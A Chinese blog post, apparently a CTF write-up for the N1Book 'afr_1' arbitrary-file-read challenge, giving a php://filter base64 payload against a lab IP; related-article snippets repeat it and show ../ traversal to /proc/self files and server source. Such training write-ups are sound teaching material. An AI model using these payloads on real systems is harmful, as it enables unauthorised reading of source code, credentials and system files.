NU1LCTFer的成长之路-web入门-任意文件读取漏洞-afr_1-wp

最新推荐文章于 2024-01-25 17:28:26 发布
最新推荐文章于 2024-01-25 17:28:26 发布
阅读量315 收藏 1
点赞数
分类专栏: ctf记录
><本博客上原创文章未经本人许可,不得用于商业用途。转载请注明出处,否则保留追究法律责任的权利。><
本文链接:https://blog.csdn.net/weixin_46439278/article/details/118343699
版权

afr_1

payload

http://192.168.60.134/?p=php://filter/convert.base64-encode/resource=flag

这句话的意思是我们用base64编码的方式来读文件index.php;这时页面会显示出源文件index.php经过base64编码后的内容,然后经过base64解码就可以看到flag;

BP base64解码得到flag

居上7788
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUU-N1BOOK-Web
楼阁de猫的博客
12-11 979
web入门[第一章 web入门]常见的信息搜集[第一章 web入门]粗心的小李 [第一章 web入门]常见的信息搜集 考查知识点: 1.常规文件:robots.txt 2.gedit备份文件 3.vim备份文件 首先看robots.txt: 访问一下这个文件得到flag1 再看一下原始文件ihdex.php,发现什么都没有,之前用dirsearch扫了很多东西出来,试了/.git发现也不对,这里就看到书上讲到了gedit备份文件,它是以 ~ 为后缀的,试试index.php~,有东西了,拿到flag
N1Book-第一章Web入门-任意文件读取漏洞-afr_1
抒情诗
05-08 346
这个是传统的任意文件读取漏洞,可以利用php的本地文件包含(Local File Include)实现,使用php的伪协议进行文件读取;或者利用php文件读取函数。本题为Nu1L团队编著的《从0到1:CTFer成长》配套题目。来源网站:https://book.nu1l.com/这里可能没有include文件包含,而是使用。没源码不好分析,这里应该逻辑也不大难。造成的文件读取漏洞
【第一章 web入门]afr_1 1】任意文件读取
最新发布
carrot11223的博客
01-25 744
任意文件读取/下载漏洞(Arbitrary File Read/Download Vulnerability),是指攻击者可以通过某些漏洞,绕过应用程序的限制,直接读取或下载应用程序之外的文件。这种漏洞通常是由于应用程序没有对用户输入进行充分的验证和过滤而导致的。攻击者可以通过构造恶意的请求来利用该漏洞,从而读取或下载他们本来无权访问的文件,如密码、私钥、证书等,会提供攻击者更多可用信息,提高被入侵的风险。
afr_1
weixin_45711265的博客
01-09 391
buuctf N1book ok,让我们继续看看 buuctf N1book afr_1 任意文件读取 打开靶机,发现url上有提示"p="为任意文件读取,利用php伪协议php://filter/read=convert.base64-encode/resource=index.php ?p=php://filter/read=convert.base64-encode/resource=flag(此时无后缀,因为原题p=hello无后缀,猜测后台添加后缀) 得到PD9waHAKZGllKCdubyBu
01ctfer/任意文件读取/afr_1 题解
QYbkx974的博客
11-15 150
sudo docker-compose up -d 拉取镜像。docker-compose.yml 文件名称。,存在url传参,直接输入。猜测存在过滤,代码可能为。加入.php后缀后不输出。了,可以使用封装协议中的。,使用base64解码。发现打开该网页时出现。
文件读取/包含】任意文件读取漏洞 afr_1
wj33333的博客
11-15 334
filepath=php://filter/read=convert.base64-encode/resource=[目标文件]3.访问kali 80端口。所以可能是/index.html包含了。2.将该代码写入文件
ALM-Board-Manual-V1.9.zip_Air-fuel ratio_The Chip_cj125_oxygen s
07-14
ALM (Accurate Lambda Meter) is an air- fuel -ratio (AFR) meter which uses the Bosch LSU4.9 wideband oxygen sensor and Bosch semiconductor chip CJ125 to accurately measure the AFR or lambda for ...
ISO639-2.docx
06-16
例如,阿非利卡语(Afrikaans)的ISO 639-2代码是“afr”,而在ISO 639-1中,它的代码是“af”。这允许开发者在不同环境下灵活地识别和处理语言。 标准中还列出了多种语言,如阿非利坎语、阿瓦语、阿布哈兹语、阿伊...
3.国民技术N32G45X例程之-JTAG口复用GPIO.rar
12-23
复用过程涉及到对GPIO端口配置寄存器的操作,如AFR(Alternate Function Register)等,以设置相应的复用功能模式。 然而,描述中提到“原库函数有BUG”,这意味着在官方提供的例程或库函数中可能存在错误,导致...
士研电机液面控制器AFR-1说明书.pdf
09-11
士研电机液面控制器AFR-1说明书pdf,士研电机液面控制器AFR-1说明书:适用于控制任何导电液体之液面,用于交流电,具有突波保护装置,可有效的防止突波干扰,电极头使用低交流电压,可增加寿命,有两只指示灯,指示供水...
afr-f1.github.io
03-27
【标题】"afr-f1.github.io"是一个GitHub托管的个人或组织的网站项目,通常用于展示个人作品、博客文章或者开源项目的文档。这个标题暗示了这是一个基于静态页面生成的项目,很可能使用了GitHub Pages服务。 【描述...
i春秋 afr1 解题过程 题解 原理 PHP伪协议 文件包含漏洞
AAAAAAAAAAAA66的博客
11-20 853
知识面决定攻击的广度,知识链决定攻击的深度。 最近尝试了一下挖洞,捣鼓了一天还是啥都没有,没有头绪后,还是去写点CTF题,扩充下知识面,2个方向算是互补吧。 工具 dirsearch(目录扫描工具) 火狐 hackbar 知识点 php://伪协议 php://伪协议是PHP提供的一些输入输出流访问功能,允许访问PHP的输入输出流,标准输入输出的错误描述符,内存中,磁盘备份的临时文件流,以及可以操作其他读取和写入文件资源的过滤器。 php://filter是元封装器...
[第一章 web入门]afr_1
qq_43618536的博客
07-24 820
[第一章 web入门]afr_1
NU1LCTFer成长-web入门-任意文件读取漏洞-afr_3-wp
居上
06-29 462
afr_3 考查内容:对linux系统中/proc/目录下文件作用的了解,同时考查了flask模板注入 请求 http://192.168.60.134/article?name=…/…/…/…/…/proc/self/cmdline获取当前执行系统命令,得到 查看源代码,中间有个空格的 python server.py 请求 http://192.168.60.134/article?name=…/…/…/…/…/proc/self/cwd/server.py获取源码 @app.route("/n1
BUUCTF[第一章 web入门]afr_1
hivjianxian的博客
11-22 528
ctf题解
ctfhub afr-2
weixin_63810302的博客
09-28 993
ctfhub afr-2
NU1L-BOOK题目[第一章]
baidu_39504221的博客
11-24 699
文章目录[第一章 web入门]常见的搜集[第一章 web入门]粗心的小李[第一章 web入门]SQL注入-1[第一章 web入门]afr_1[第一章 web入门]afr_2[第一章 web入门]SQL注入-2 [第一章 web入门]常见的搜集 扫他后台 robots.txt index.php~ .index.php.swp [第一章 web入门]粗心的小李 直接使用书上推荐的工具scrabble 看他网站源码 [第一章 web入门]SQL注入-1 直接单引号报错,存在注入 查看字段 order
《从0到1:CTFer成长》afr_1
ZhShy
01-12 2011
文章目录靶场:afr_1知识点解题过程Flag:n1book{afr_1_solved} 靶场:afr_1 知识点 PHP向用户提供的指定待打开文件的方式,是一个文件流 PHP的Filter机制,可对目前的协议进行一定的处理,比如将当前文件流的内容进行Base64编码。 http://127.0.0.1/cmd.php?file=php://filter/convert.base64-encode/resource=cmd 利用Filter机制,构造形如以上的攻击数据可以读取文件,拿到各种文件的源码
从0到1CTFer成长-第一章-任意文件读取漏洞
黑白的博客
03-01 1335
任意文件读取漏洞 声明 好好向大佬们学习!!! 攻击 afr_1 kali执行 vim docker-compose.yml 内容如下 version: '3.2' services: web: image: registry.cn-hangzhou.aliyuncs.com/n1book/web-information-backk:latest ports: - 80:80 开启docker docker-compose up -d 访问80 http://192.
阿尔法AFR-K3由器详细教程:配置与功能详解
本文档详细介绍了阿尔法AFR-K3因特网宽带由器的设置教程,该由器具有多项高级功能和特性,旨在为用户提供高速、稳定且安全的网络环境。 1. **性能与稳定性**: 阿尔法由器拥有高速稳定的运算能力,这意味着...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值